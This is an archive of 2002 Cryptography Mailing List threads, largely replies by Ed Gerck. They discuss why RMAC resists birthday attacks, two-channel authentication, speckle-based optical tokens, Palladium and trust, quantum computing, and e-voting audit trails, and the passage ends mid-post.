> On Tue, 22 Oct 2002, Ed Gerck wrote:
>
> > Short answer:  Because the MAC tag is doubled in size.
>
> I know, but this is not my question.

;-) your question was "Why is RMAC resistant to birthday attacks?"

> > Longer answer: The “birthday paradox” says that if the MAC tag has t bits,
> > only 2^(t/2) queries to the MAC oracle are likely  needed in order to discover
> > two messages with the same tag, i.e., a “collision,” from which forgeries
> > could easily be constructed.
>
> So the threat model assumes that there is a MAC oracle. What is a
> practical realization of such an oracle? Does Eve simply wait for (or
> entice) Alice to send enough (intercepted) messages to Bob?

Eve may just watch traffic that comes into her company's servers, knowing
the back-end plain text messages. No need to watch external networks. Eve
may also be, for example, one of those third-party monitoring services that
monitor traffic inside enterprise's networks for the purpose of "assuring security".

> Are there any other birthday attack scenarios for keyed MAC?

A birthday attack requires 2^(t/2) values, which looks surprising low -- hence
the name "paradox" (btw, this attack provides the mathematical model behind the
game of finding people with same birthday in a party, which works for a
surprisingly low number of people).  If you can get 2^(t/2) values, the attack
works.

> In many
> applications the collection sufficiently many messages between Alice and
> Bob is simply out of the question. In such cases if Eve cannot mount the
> attack independently and cannot collect 2^(n/2) messages from Alice to
> Bob, presumably RMAC does not offer an advantage over any other keyed MAC.

In an Internet message, datagrams can be inserted, dropped, duplicated, tampered
with or delivered out of order at the network layer (and often at the link layer). TCP
implements a reliable transport mechanism  and copes with the datagram unreliability
at the lower layers. However, TCP is unable to cope with a fraudulent datagram that is
crafted to pass TCP's protocol checks and is inserted into the datagram stream. That
datagram will be accepted by TCP and passed on to higher layers. A cryptographic
system operating  below TCP is needed to avoid this attack and filter out the deviant
datagrams -- and that's where you would use a MAC, if you want to protect each
datagram. It's not difficult, thus, to have more than 2^32 MACs in one message or
in a series of messages.

This is a scenario where it is not so difficult for an attacker to forge an acceptable
MAC for a datagram that was not sent in a given sequence, possibly tampering with
the upper-layer message and also making it more vulnerable to denial-of-service 
attacks.
Note that having a MAC above TCP does not prevent this attack, even though it can
detect it (and thus lead to a denial-of-service).

> I am not confused by the RMAC algorithm or so the associated work factor
> estimates, I want to understand the assumptions (threat models) behind the
> work factor estimates. Does the above look right?

If birthday attack is a concern, RMAC is helpful. If not, then not.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-22 Thread Ed Gerck


Wei Dai wrote:

> On Tue, Oct 22, 2002 at 11:09:41AM -0700, bear wrote:
> > Now Bob sends Alice 2^32 messages (and Alice's key-management
> > software totally doesn't notice that the key has been worn to
> > a nub and prompt her to revoke it).  Reviewing his files, Bob
> > finds that he has a January 21 document and a September 30
> > document which have the same MAC.
> >
> > What does Bob do now?  How does this get Bob the ability to
> > create something Alice didn't sign, but which has a valid MAC
> > from Alice's key?
>
> Call the Jan 21 document x, and the Sept 30 document y. Now Bob knows
> MAC_Alice(x | z) = MAC_Alice(y | z) for all z, because the internal states
> of the MAC after processing x and y are the same and therefore will remain
> equal given identical suffixes.

My earlier comment to bear applies here as well -- this attack can be avoided
if only a subset of the MAC tag  is used OR if the message to be hashed has
a fixed length defined by the issuer. Only one of these conditions are needed.

> So he can get a MAC on x | z and
> it's also a valid MAC for y | z, which Alice didn't sign.  This applies
> for CBC-MAC, DMAC, HMAC, and any another MAC that is not randomized or
> maintains state (for example a counter) from message to message.

except as above noted, which is easy to implement.

Cheers,
Ed Gerck




-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-22 Thread Ed Gerck


bear wrote:

> On Tue, 22 Oct 2002, Ed Gerck wrote:
>
> >Short answer:  Because the MAC tag is doubled in size.
> >
> >Longer answer: The “birthday paradox” says that if the MAC tag has t bits,
> >only 2^(t/2) queries to the MAC oracle are likely  needed in order to discover
> >two messages with the same tag, i.e., a “collision,” from which forgeries
> >could easily be constructed.
>
> This is a point I don't think I quite "get". Suppose that I have
> a MAC "oracle" and I bounce 2^32 messages off of it.  With a
> 64-bit MAC, the odds are about even that two of those messages
> will come back with the same MAC.
>
> But why does that buy me the ability to "easily" make a forgery?

;-) please note that you already have one forgery...

BTW, it is important to look at the size of the internal chaining variable.
If it is 128-bit, this means that attacks with a 2^128 burden would likely
work. However, if only a subset of the MAC tag  is used OR if the
message to be hashed has a fixed length defined by the issuer, this is not
relevant. Only one of these conditions are needed.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-22 Thread Ed Gerck


Sidney Markowitz wrote:

> "bear" <[EMAIL PROTECTED]> asked:
> > But why does that buy me the ability to "easily" make a forgery?
>
> It doesn't. As described in the paper all you can do with it is the following:
>
> Mallory discovers that a message from Alice "Buy a carton of milk" and another
> message from Alice "Get a dozen eggs" are sent with the same salt and have the
> same MAC, ...

It does to (as you can read in the paper). BTW, the "easily" applies to the case
WITHOUT salt -- ie., without RMAC. But that's why RMAC was proposed ;-)

Cheers,
Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-22 Thread Ed Gerck
Short answer:  Because the MAC tag is doubled in size.

Longer answer: The “birthday paradox” says that if the MAC tag has t bits,
only 2^(t/2) queries to the MAC oracle are likely  needed in order to discover
two messages with the same tag, i.e., a “collision,” from which forgeries
could easily be constructed. In RMAC, t is increased to 2t, so that
2^(2t/2) = 2^t and there is no reduction in the number of queries due to the
"birthday paradox". For example, for a MAC tag with 128-bit keys, the number
of queries that bound the chance of a forgery is still close to 128 bits. The
penalty is doubling the size of the MAC tag.

BTW, for MAC systems where collisions are prevented a priori, the
"birthday paradox" does not apply.

Cheers,
Ed Gerck

[EMAIL PROTECTED] wrote:

> The RMAC FIPS draft does not appear to explicitly state when RMAC is
> useful. What is the scenario in which (presumably unlike some other keyed
> MAC algorithms) RMAC is resistant to birthday attacks? More broadly for an
> arbitrary keyed MAC (in a plausible application!) how does the birthday
> attack come into play?
>
> With unkeyed message digests encrypted by a public key, the attacks are
> clear, Alice sends Bob message A, Bob agrees to message A, and signs it.
> Later Alice claims that Bob signed message B. The birthday paradox
> helps Alice because she can generate lots of minor variants of each
> message, generate ~sqrt(2^n) hashes of each and have a good shot at
> finding a collision.
>
> With keyed MACs Alice and Bob share the same secretkeys, either can
> freely generate messages with correct MAC values, so the MAC cannot be
> used as evidence to a third party that Alice is the signer of the
> message.
>
> In this case the attacker is clearly not either Alice or Bob. So Eve wants
> to convince Bob that a message really is from Alice. What does Eve do?
> Does Eve somehow entice Alice to send ~sqrt(2^n) messages to Bob? How does
> the birthday attack come into play when the attacker cannot independently
> test potential collisions?
>
> Please pardon the naive question, I just want to understand the premises
> of the problem to which RMAC is a solution.
>
> --
> Viktor.
>
> -
> The Cryptography Mailing List
> Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Microsoft marries RSA Security to Windows

2002-10-15 Thread Ed Gerck

[I'm reducing the reply level to 2, for context please see former msg]

"Arnold G. Reinhold" wrote:

> At 8:40 AM -0700 10/11/02, Ed Gerck wrote:
> >Cloning the cell phone has no effect unless you also have the credentials
> >to initiate the transaction. The cell phone cannot initiate the authentication
> >event. Of course, if you put a gun to the user's head you can get it all but
> >that is not the threat model.
>
> If we're looking at high security applications, an analysis of a
> two-factor system has to assume that one factor is compromised (as
> you point out at the end of your response). I concede that there are
> large classes of low security applications where using a cell phone
> may be good enough, particularly where the user may not be
> cooperative. This includes situations where users have an economic
> incentive to share their login/password, e.g. subscriptions, and in
> privacy applications ("Our logs show you accessed Mr. Celebrity's
> medical records, yet he was never your patient." "Someone must have
> guessed my password." "How did they get your cell phone too?")

I like the medical record dialogue. But please note that what you wrote is
much stronger than asking "How did they get your hardware token too?"
because you could justifiably go for days without noticing that the hardware
token is missing but you (especially if you are an MD) would almost
immediately notice that your cell phone is missing. Traffic logs and call
parties for received and dialed calls could also be used to prove that you
indeed used your cell phone both before and after the improper access. Also,
if you lose your cell phone you are in a lot more trouble.

The point made here is that the aggregate value associated with the cell
phone used for receiving a SMS one-time code is always higher than that
associated with the hardware token (it is token +), hence its usefulness
in the security scheme. Denying possession of the cell phone would be
harder to do -- and easier to disprove -- than denying possession of the
hardware token.

> Here the issue is preventing the user from cloning his account or denying
> its unauthorized use, not authentication.

The main objective of two-channel, two-factor authentication (as we
are discussing) is to prevent unauthorized access EVEN if the user's
credentials are compromised. This includes what you mentioned, in addition
to assuring authentication (i.e., preventing the user from cloning his account;
allowing enterprises to deny the unauthorized use of user's accounts).

Now, why should the second channel be provided ONLY by a hardware
token?  There is no such need, or security benefit.

The second channel can be provided by a hardware token, by an SMS-
enabled cell phone, by a pager or by ANY other means that creates a
second communication channel that is at least partially independent from
the first one. There is no requirement for the channels to be 100%
independent. Even though 100% independency is clearly desirable and can
be provided in some systems, it is hard to accomplish for a number of reasons
(indexing being one of them). In RSA SecurID, for example, the user's
PIN (which is a shared secret) is used both in the first channel (authenticating
the user) as well as in the second channel (authenticating the  passcode). Note also
that in SecurID systems without a PIN pad, the PIN is simply prefixed in plain
text to the random code and both are sent in the passcode.

The second channel could even be provided, for example, by an HTTPS (no
MITM) response in the same browser session (where the purported user
entered the correct credentials) if the response can be processed by an
independent means that is inacessible to others except the authorized user
(for example, a code book, an SMS query-response, a crypto calculator, etc.)
and the result fed back into the browser (i.e., as a challenge response).

>
> >
> >A local solution on the PDA side is possible too, and may be helpful where
> >the mobile service may not work. However, it has less potential for wide
> >use. Today, 95% of all cell phones used in the US are SMS enabled.
>
> What percentage are enabled for downloadable games? A security
> program would be simpler than most games.  It might be feasible to
> upload a new "game" periodically for added security.

There is nothing dowloaded on the cell phone.  Mobile RSA SecurID and
NMA ZSentryID are zero foot print applications.

BTW, requiring the download of a game or code opens another can of worms
-- whether the code is trusted by both sender and receiver (being trusted by
just one of them is not enough).

> >> 2. Even if the phone is tamperproof, SMS messages can be intercepted.
> >> I can imagine a man-in-the-middle attack where the attacker cuts 

Re: Microsoft marries RSA Security to Windows

2002-10-15 Thread Ed Gerck
ou can also use email.

> 9. Improved technology should make authentication tokens even more
> attractive. For one thing they can be made very small and waterproof.
> Connection modes like USB and Bluetooth can eliminate the need to
> type in a code, or allow the PIN to be entered directly into the
> token (my preference).

It's costly, makes you carry an additional thing and -- most important
of all -- needs that pesky interface at the other end.

> 10. There is room for more innovative tokens. Imagine a finger ring
> that detects body heat and pulse and  knows if it has removed. It
> could then refuse to work, emit a distress code when next used or
> simply require an additional authentication step to be reactivated.
> Even implants are feasible.

There is always room for evolution, and that's why we shan't run out of
work ;-)

However, not everyone wants to have an implant or carry a ring on their
finger -- which can be scanned and the subject targeted for a more serious
threat. My general remark on biometrics applies here -- when you are the
key (eg, your live fingerprint),  key compromise has the potential to be
much serious and harmful to you.

BTW, what is the main benefit of two-channel (as opposed to just two-factor)
authentication? The main benefit is that security can be assured even if the user's
credentials are compromised -- for example, by writing their passwords on stick-it
notes on their screen, or under their keyboards, or by using weak passwords, or
even having their passwords silently sniffed by malicious sofware/hardware,
problems that are very thorny  today and really have no solution but to add
another, independent, communication channel. Trust on authentication effectiveness
depends on using more than one channel, which is a general characteristic of trust
( http://nma.com/papers/it-trust-part1.pdf  )

Cheers,
Ed Gerck


>
>
> Arnold Reinhold
>
> At 8:56 AM -0700 10/9/02, Ed Gerck wrote:
> >Tamper-resistant hardware is out, second channel with remote source is in.
> >Trust can be induced this way too, and better. There is no need for
> >PRNG in plain
> >view, no seed value known. Delay time of 60 seconds (or more) is fine because
> >each one-time code applies only to one page served.
> >
> >Please take a look at:
> >http://www.rsasecurity.com/products/mobile/datasheets/SIDMOB_DS_0802.pdf
> >
> >and http://nma.com/zsentry/
> >
> >Microsoft's move is good, RSA gets a good ride too, and the door may open
> >for a standards-based two-channel authentication method.
> >
> >Cheers,
> >Ed Gerck
> >
> >"Roy M.Silvernail" wrote:
> >
> >> On Tuesday 08 October 2002 10:11 pm, it was said:
> >>
> >> > Microsoft marries RSA Security to Windows
> >> > http://www.theregister.co.uk/content/55/27499.html
> >>
> >> [...]
> >>
> >> > The first initiatives will centre on Microsoft's licensing of RSA SecurID
> >> > two-factor authentication software and RSA Security's
> >>development of an RSA
> >> > SecurID Software Token for Pocket PC.
> >>
> >> And here, I thought that a portion of the security embodied in a SecurID
> >> token was the fact that it was a tamper-resistant, independent piece of
> >> hardware.  Now M$ wants to put the PRNG out in plain view, along with its
> > > seed value. This cherry is just begging to be picked by some blackhat,
> > > probably exploiting a hole in Pocket Outlook.
> >>
> >


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Microsoft marries RSA Security to Windows

2002-10-10 Thread Ed Gerck

Tamper-resistant hardware is out, second channel with remote source is in.
Trust can be induced this way too, and better. There is no need for PRNG in plain
view, no seed value known. Delay time of 60 seconds (or more) is fine because
each one-time code applies only to one page served.

Please take a look at:
http://www.rsasecurity.com/products/mobile/datasheets/SIDMOB_DS_0802.pdf

and http://nma.com/zsentry/

Microsoft's move is good, RSA gets a good ride too, and the door may open
for a standards-based two-channel authentication method.

Cheers,
Ed Gerck

"Roy M.Silvernail" wrote:

> On Tuesday 08 October 2002 10:11 pm, it was said:
>
> > Microsoft marries RSA Security to Windows
> > http://www.theregister.co.uk/content/55/27499.html
>
> [...]
>
> > The first initiatives will centre on Microsoft's licensing of RSA SecurID
> > two-factor authentication software and RSA Security's development of an RSA
> > SecurID Software Token for Pocket PC.
>
> And here, I thought that a portion of the security embodied in a SecurID
> token was the fact that it was a tamper-resistant, independent piece of
> hardware.  Now M$ wants to put the PRNG out in plain view, along with its
> seed value. This cherry is just begging to be picked by some blackhat,
> probably exploiting a hole in Pocket Outlook.
>
> -
> The Cryptography Mailing List
> Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: unforgeable optical tokens?

2002-09-22 Thread Ed Gerck



bear wrote:

> Anyway; it's nothing particularly great for remote authentication;
> but it's *extremely* cool for local authentication.

Local authentication still has several optical issues that need to be answered,
and which may limit the field usefullness of a device based on laser speckle.

For example, optical noise by both diffraction and interference effects is a
large problem -- a small scratch, dent, fiber, or other mark (even invisible,
but producing an optical phase change) could change all or most all of
the speckle field. The authors report that a 0.5mm hole produces a large
overall change -- which can be easily understood since the smaller the defect,
the larger the spatial effect (Fourier transform).

But temperature/humidity/cycle differences might be worse -- any dilation or
contraction created by a temperature/humidity/cycle difference between recording
time (in lab conditions) and the actual validation time (in field conditions) would
change the entire speckle field in a way which is not "geometric" -- you can't just
scale it up and down to search for a fit.

Also, one needs to recall that this is not a random field -- this IS a speckle field.
There is a definite higher probability for bunching at dark and white areas
(because of the scatter's form, sine function properties, laser coherence length,
etc). This intrinsic regularity can be used to reduce the search space to a much
lower space than what I saw suggested.  Taking into account loss of resolution
by vibration and positioning would also reduce the search space.

Finally, the speckle field will show autocorrelation properties related to the sphere's
size and size distribution, which will further reduce randomness. In fact, this is a
standard application of speckle: to measure the diameter statistics of small spheres.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Cryptogram: Palladium Only for DRM

2002-09-18 Thread Ed Gerck



"Peter N. Biddle" wrote:

> Hey Ed - I think that we may be in agreement. Most of what you say below
> makes sense to me.

what you said also looks good

> I'd love to see your papers.

A recent summary is at  http://nma.com/papers/gerck_on_trust.pdf

Cheers,
Ed Gerck




-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Cryptogram: Palladium Only for DRM

2002-09-18 Thread Ed Gerck

Peter:

The question of "what is trust" might fill this listserver for months.
But, if we want to address some of the issues that Pd (and, to some
extent, PKI) forces on us then we must be clear what we mean when
we talk about  trust in a communication system -- what is a trusted
certificate, a trusted computer? Trusted for what? What happens
when I connect two computers that are trusted on matters of X --
are they trusted together on matters of X, less or more? What do
we mean by trustworthy?

I can send you some of my papers on this but the conclusion I arrived
is that in terms of a communication process, trust has nothing to do with
feelings or emotions.

Trust is qualified reliance on information, based on factors independent of
that information.

In short, trust needs multiple, independent channels to be communicated.
Trust cannot be induced by self-assertions -- like, "trust me!"  or "trust Pd!"
More precisely, "Trust is that which is essential to a communication channel
but cannot be transferred using that channel."  Please see the topic “Trust Points”
by myself in “Digital Certificates: Applied Internet Security” by Jalal Feghhi,
Jalil Feghhi and Peter Williams, Addison-Wesley, ISBN 0-20-130980-7, pages
194-195, 1998.

That said, the option of being *able* to define your own signatures on what
you decide to trust does not preclude you from deciding to rely on someone
else's signature.  BTW, this has been used for some time with a hardened version
of Netscape, where the browser does not use *any* root CA cert unless you sign
it first.

Thanks for your nice  comment ;-)

Ed Gerck



Peter wrote:

> I disagree with your first sentence (I believe that Pd must be trustworthy
> for *the user*), but I like much of the rest of the first paragraph.
>
> I am not sure what value my mother would find in defining her own
> signatures. She doesn't know what they are, and would thus have no idea on
> who or what to trust without some help.
>
> What my mother might trust is some third party (for example she might trust
> Consumer's Union). We assumed we needed a structure which lets users
> delegate trust to people who understand it and who are investing in
> "branding" their take on the trustworthiness of a given "thing" (think UL
> label, Good Housekeepking Seal of Approval, etc.). I totally agree that some
> small segment of users will have an active interest in managing the trust on
> their machines directly (like, maybe, us) but any architecture that you want
> to be used by "normal" PC users needs to also let users delegate this
> managment to others who can manage it for users (just like we might decide
> to use others to manage our retirement funds, defend us in a court of law,
> or operate on our kidneys).
>
> To delegate trust, you need to start out trusting something to do that
> delegation. That's part of what Pd is addressing - Pd needs to be
> trustworthy enough so that when a user sets policy (eg "don't run any SW in
> Pd which isn't signed by the EFF" or "don't run any SW which isn't
> debuggable"), it is enforced.
>
> P
>
> - Original Message -
> From: "Ed Gerck" <[EMAIL PROTECTED]>
> Cc: <[EMAIL PROTECTED]>
> Sent: Tuesday, September 17, 2002 2:51 PM
> Subject: Re: Cryptogram: Palladium Only for DRM
>
> >
> > It may be useful to start off with the observation that Palladium will not
> be
> > the answer for a platform that *the user* can trust.  However, Palladium
> > should raise awareness on the issue of what a user can trust, and what
> not.
> > Since a controling element has to lie outside the controled system, the
> solution
> > for a trustworthy system is indeed an independent module with processing
> > capability -- but which module the user should be able to control..
> >
> > This may be a good, timely opening for a solution  in terms of a "write
> code"
> > approach, where an open source trustworthy (as opposed to trusted)
> > secure execution module TSEM (e.g., based on a JVM with permission
> > and access management) could be developed and -- possibly -- burned on a
> > chip set for a low cost system. The TSEM would require user-defined
> > signatures to define what is trustworthy to *the user*, which would set a
> higher
> > bar for security when compared with someone else defining what is
> > trustworthy to the user.  The TSEM could be made tamper-evident, too.
> >
> > Note: This would not be in competition with NCipher's SEE, because
> NCipher's
> > product is for the high-end market and involves commercial warranties,
> > but NCipher's SEE module is IMO a good example.
> >
> > Comments?
> >
> > Ed Gerck
> >
> >
> >
> >
> > -
> > The Cryptography Mailing List
> > Unsubscribe by sending "unsubscribe cryptography" to
> [EMAIL PROTECTED]
> >


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Cryptogram: Palladium Only for DRM

2002-09-17 Thread Ed Gerck


It may be useful to start off with the observation that Palladium will not be
the answer for a platform that *the user* can trust.  However, Palladium
should raise awareness on the issue of what a user can trust, and what not.
Since a controling element has to lie outside the controled system, the solution
for a trustworthy system is indeed an independent module with processing
capability -- but which module the user should be able to control..

This may be a good, timely opening for a solution  in terms of a "write code"
approach, where an open source trustworthy (as opposed to trusted)
secure execution module TSEM (e.g., based on a JVM with permission
and access management) could be developed and -- possibly -- burned on a
chip set for a low cost system. The TSEM would require user-defined
signatures to define what is trustworthy to *the user*, which would set a higher
bar for security when compared with someone else defining what is
trustworthy to the user.  The TSEM could be made tamper-evident, too.

Note: This would not be in competition with NCipher's SEE, because NCipher's
product is for the high-end market and involves commercial warranties,
but NCipher's SEE module is IMO a good example.

Comments?

Ed Gerck




-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Quantum computers inch closer?

2002-09-03 Thread Ed Gerck



Jaap-Henk Hoepman wrote:

> On Mon, 02 Sep 2002 17:59:12 -0400 "John S. Denker" <[EMAIL PROTECTED]> writes:
> > The same applies even more strongly to quantum computing:
> > It would be nice if you could take a classical circuit,
> > automatically convert it to "the" corresponding quantum
> > circuit, with the property that when presented with a
> > superposition of questions it would produce "the"
> > corresponding superposition of answers.  But that cannot
> > be.  For starters, there will be some phase relationships
> > between the various components of the superposition of
> > answers, and the classical circuit provides no guidance
> > as to what the phase relationships should be.
>
> In fact you can! For any efficient classical circuit f there exists an
> efficient quantum circuit Uf that does exactly what you describe:
> when given an equal superposition of inputs it will produce the equal
> superposition of corresponding outputs.

Jaap-Henk,

a proof of existence does not allow one to automatically convert a classical
circuit to "the" corresponding quantum circuit, which was the original comment
by John. Devising QC algorithms from classical algorithms should not be
the best way to do it, either.

Cheers,
Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Quantum computers inch closer?

2002-09-03 Thread Ed Gerck



David Wagner wrote:

> Ed Gerck  wrote:
> >The original poster is correct, however, in that a metric function can
> >be defined
> >and used by a QC to calculate the distance between a random state and an
> >eigenstate with some desired properties, and thereby allow the QC to define
> >when that distance is zero -- which provides the needle-in-the-haystack
> >solution,
> >even though each random state vector can be seen as a mixed state and will, with
> >higher probability, be representable by a linear combination of eigenvectors
> >with random coefficients, rather than by a single eigenvector.
>
> I must admit I can't for the life of me figure out what this paragraph
> was supposed to mean.  Maybe that's quantum for you.

In other words, even though most of the time a QC will be dealing with
mixed states (ie, states that cannot be represented by a single eigenvector),
a QC can nonetheless use a metric function (such as loosely described
by the original poster) in order to arrive at the desired needle-in-the-haystack
solution -- that might be a single eigenvector.

> But I take it we agree: The original poster's suggested "scheme" for
> cracking Feistel ciphers doesn't work, because quantum computers don't
> work like that.  Agreed?

As I commented at the time, and where I think we agree, the scheme does not
make Feistel ciphers easier to break by quantum computing.  It's not what a
"quantum algorithm". However, we need to recognize that the scheme suggested
is sound for any computer and a QC *is* a computer -- but it would be no better
for a QC than  an exhaustive search. In short, his  method had nothing "quantum"
about it.

Here, the essential point for an effective QC solution is not whether the
calculation is possible (which it is if it can be computed), but that it should
be capable of being efficiently transposed to a quantum system.  Breaking a
Feistel cipher cannot, breaking RSA PK can.

Cheers,
Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Quantum computers inch closer?

2002-09-02 Thread Ed Gerck



David Wagner wrote:

> David Honig  wrote:
> >At 08:56 PM 8/30/02 -0700, AARG!Anonymous wrote:
> >>The problem is that you can't forcibly collapse the state vector into your
> >>wished-for eigenstate, the one where the plaintext recognizer returns a 1.
> >>Instead, it will collapse into a random state, associated with a random
> >>key, and it is overwhelmingly likely that this key is one for which the
> >>recognizer returns 0.
> >
> >I thought the whole point of quantum-computer design is to build
> >systems where you *do* impose your arbitrary constraints on the system.
>
> Look again at those quantum texts.  AARG! is absolutely correct.
> Quantum doesn't work like the original poster seemed to wish it would;
> state vectors collapse into a random state, not into that one magic
> needle-in-a-haystack state you wish it could find.

The original poster was incorrect just in assuming that this would be an
effective method allowing Feistel ciphers to be broken.

The original poster is correct, however, in that a metric function can be defined
and used by a QC to calculate the distance between a random state and an
eigenstate with some desired properties, and thereby allow the QC to define
when that distance is zero -- which provides the needle-in-the-haystack solution,
even though each random state vector can be seen as a mixed state and will, with
higher probability, be representable by a linear combination of eigenvectors
with random coefficients, rather than by a single eigenvector.

Cheers,
Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Quantum computers inch closer?

2002-08-30 Thread Ed Gerck



bear wrote:

> On Sat, 17 Aug 2002, Perry E. Metzger wrote:
>
> >
> >[I don't know what to make of this story. Anyone have information? --Perry]
> >
> >Quantum computer called possible with today's tech
> >http://www.eet.com/story/OEG20020806S0030
> >
> ..
> The papers I've been reading claim that feistel ciphers (such as
> AES, DES, IDEA, etc) are fairly secure against QC.
>
> But I don't see how this can be true in the case where the
> opponent has a plaintext-ciphertext pair.
> ...
> I'm not a quantum physicist; I could be wrong here.  In
> fact, I'm probably wrong here.  But can anyone explain
> to me *why* I'm wrong here?

I'm a quantum physicist. Your argument is good but it has
nothing to do with quantum physics. The claim that feistel
ciphers are fairly secure against QC has to do with a
complex calculation that has no counterpart in a physical
system that could be used to "calculate" it. Not that the
calculation is not possible, but that it cannot be efficiently
transposed to a QC. Other ciphers may be a lot easier in this
regard  -- for example, there is a good similarity between
factoring the product of two primes and calculating
standing wave harmonics in a suitable quantum system.

Cheers,
Ed Gerck





-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



wrong data model -- Re: MS DRMOS Palladium -- The Trojan Horse OS

2002-07-04 Thread Ed Gerck

Marc:

There is no reason IMO to talk about economics when basic
properties are being ignored.

DRMOS will fail for pretty much the same basic reason that PKI
is failing. We are still trying to create an absolute reference
to measure "distance" in dataspace, when such reference
cannot exist by definition. Data is not an absolute property.
Choosing a reference, and even trying to enforce it, is illusory.
Distance can be measured without extrinsic references and this
is the only model that fits the properties that we need to assign
to data.

A wrong data model is being used, which nonetheless may still
sound intuitive. But one cannot revoke the law of gravity, even
though one might have a good market for such.

Cheers,
Ed Gerck


Marc Branchaud wrote:

> By patenting the DRMOS, only M$ will be allowed to create such a beast
> (OK, they could license the patent without restrictions -- pardon me
> while I pick myself up off the floor).  This means that the rest of the
> planet's OSes will have nothing even approaching DRM functionality,
> because nobody wants to be sued by M$.
>
> That's good, but OTOH other OSes will not build anything approaching
> secure computing either, for the same reason.
>
> I expect M$ OSes to provide both secure computing as well as the DRM
> nightmare outlined in Stallman's story.  I also expect all other OSes to
> provide neither secure computing nor DRM.
>
> Software patents.  Gotta love em!
>
> M.
>
> -
> The Cryptography Mailing List
> Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: TCPA / Palladium FAQ (was: Re: Ross's TCPA paper)

2002-06-27 Thread Ed Gerck


Interesting Q&A paper and list comments. Three
additional comments:

1. DRM and privacy  look like apple and speedboats.
Privacy includes the option of not telling, which DRM
does not have.

2. Palladium looks like just another vaporware from
Microsoft, to preempt a market like when MS promised
Windows and killed IBM's OS/2 in the process.

3. Embedding keys in mass-produced chips has
great sales potential. Now we may have to upgrade
processors also because the key  is compromised ;-)

Cheers,
Ed Gerck

PS: We would be much better off with OS/2, IMO.

Ross Anderson wrote:

> http://www.cl.cam.ac.uk/~rja14/tcpa-faq.html
>
> Ross
>
> -
> The Cryptography Mailing List
> Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Shortcut digital signature verification failure

2002-06-21 Thread Ed Gerck


A DoS would not pitch one client against one server. A distributed attack
using several clients could overcome any single server advantage.  A
scalable strategy would be a queue system for distributing load to
a pool of servers and a rating system for early rejection of repeated
bad queries from a source. The rating system would reset the source rating
after a pre-defined time, much like anti-congestion mechanisms on the Net.
Fast rejection of bogus signatures would help, but not alone.

Cheers,
Ed Gerck

Bill Frantz wrote:

> I have been thinking about how to limit denial of service attacks on a
> server which will have to verify signatures on certain transactions.  It
> seems that an attacker can just send random (or even not so random) data
> for the signature and force the server to perform extensive processing just
> to reject the transaction.
>
> If there is a digital signature algorithm which has the property that most
> invalid signatures can be detected with a small amount of processing, then
> I can force the attacker to start expending his CPU to present signatures
> which will cause my server to expend it's CPU.  This might result in a
> better balance between the resources needed by the attacker and those
> needed by the server.
>
> Cheers - Bill
>
> -
> Bill Frantz   | The principal effect of| Periwinkle -- Consulting
> (408)356-8506 | DMCA/SDMI is to prevent| 16345 Englewood Ave.
> [EMAIL PROTECTED] | fair use.  | Los Gatos, CA 95032, USA
>
> -
> The Cryptography Mailing List
> Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: FC: E-voting paper analyzes "usability" problems of currentsystems

2002-06-20 Thread Ed Gerck


[Moderator's note: I'm not sure I agree with Mr. Gerck's conclusion,
given that I don't think the proof is incorrect, but... --Perry]


> Forwarded below is an email from Dr. Rebecca Mercuri whose
> PhD dissertation contained a proof that an electronic voting
> system can be either secure (tamper proof) or anonymous
> (as in secret ballot), but NOT BOTH, "The requirement for
> ballot privacy creates an unresolvable conflict with the
> use of audit trails in providing security assurance".

The conclusion is incorrect. There is actually more than one way
to provide for ballot privacy and use effective audit trails in
electronic voting systems.

One way is to have a (sufficiently redundant) witness system
that records what the voter sees and approves as the ballot
is cast by the voter, without recording who the voter is. The
witness system can include independent witnesses controlled
by  every party or observer of the election. The vote tally result
can be verified with a confidence level as close to 100% as desired
by tallying a percentage of those witness records.  The theoretical
basis for such a system is Shannon's 10th theorem.  For a presentation,
see  http://www.vote.caltech.edu/wote01/pdfs/gerck-witness.pdf

Another way is to provide each voter with a double-blind
digital certificate that includes a nonce, and using homomorphic
enccryption for further protecting the voting pattern from
disclosing the voter's indentity (the Mafia attack) .  The nonce
